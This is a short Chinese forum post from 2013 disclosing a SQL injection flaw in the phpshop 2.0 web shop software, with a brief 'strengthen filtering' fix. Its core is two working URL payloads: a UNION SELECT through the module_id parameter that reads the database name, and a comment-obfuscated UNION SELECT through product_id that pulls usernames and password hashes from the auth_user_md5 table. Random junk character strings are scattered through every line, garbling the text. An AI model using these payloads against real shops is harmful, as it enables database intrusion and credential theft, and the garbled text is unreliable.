标题 : phpshop 2.0 SQL Injection Vulnerability" J+ R$ r: C" _" `6 H. n
& q7 V8 }" h5 p: v6 q9 p1 B作者 : By onestree
% a& [$ o$ T) F2 a( ~- W下载地址 : http://code.google.com/p/phpshop/downloads/list) H+ x0 M5 |0 r$ V* M% \- {
测试地址: windows 7 / ubuntu. A( [3 [6 H9 l2 B; y3 u+ \
' m8 b$ V) `) b- D: R- W$ a- ]
% M4 k: R0 z+ z1 \! p( u% B/ YSQLi p0c:8 r7 C2 P. C- A" c3 n
- o7 c2 w8 }2 j& _
==================
5 w6 D% W. v% c0 f* v! s + J4 e8 l1 B0 h p# j9 m# S
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'6 W- x w. ^3 P; B% o) w
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
* R6 [' k6 p3 e; |3 o0 ?
. }) M& G- @, q# v4 _http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
$ a3 S# F1 `6 X+ l5 R% n
, P- @# h% v: ]6 V% X h' z修复:6 X2 g7 F& H, H) A3 w3 r1 {
加强过滤$ u1 T) h. x3 { L
0 c8 W+ s" K5 U7 y( R: _& S3 D
/ t0 @1 C1 S& {7 {2 O5 u) ]" X
|
发表于 2013-1-18 18:24:10
收藏
支持
反对